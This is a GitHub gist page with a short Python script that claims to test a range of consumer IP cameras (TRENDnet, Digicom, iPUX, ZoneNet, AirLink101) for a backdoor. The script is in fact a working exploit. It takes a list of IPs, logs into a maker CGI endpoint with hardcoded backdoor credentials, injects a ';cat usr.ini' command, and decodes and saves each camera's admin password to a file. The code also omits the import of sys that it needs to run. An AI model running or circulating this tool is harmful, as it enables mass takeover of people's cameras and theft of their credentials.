Created
November 24, 2019 16:21
-
-
Save hosakauk/b8f50a631781017114de398b49f66e55 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''' | |
Test for backdoor in TRENDnet, Digicom, iPUX, ZoneNet, AirLink101 IP camera range | |
''' | |
import requests | |
import re | |
import base64 | |
inputfile = sys.argv[1] | |
outputfile = sys.argv[2] | |
def testcam(ip): | |
try: | |
response = requests.get("http://" | |
+ip+"/cgi/maker/ptcmd.cgi?cmd=;cat usr.ini", | |
auth=("productmaker","ftvsbannedcode"), timeout=10) | |
p = re.compile(r"(?<=admin=Basic )[^.\s]*") | |
admin = re.search(p, response.content).group() | |
adminhash = base64.b64decode(admin) | |
if len(adminhash) > 1: | |
return ("%s | %s" % (ip,adminhash)) | |
else: | |
return False | |
except: | |
pass | |
a = open(inputfile,"r") | |
lines = a.read().splitlines() | |
a.close() | |
for ip in lines: | |
camout = testcam(ip) | |
if camout is not False and camout is not None: | |
b = open(outputfile, "a") | |
b.write(camout) | |
b.write("\n") | |
b.close() | |
print(camout) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment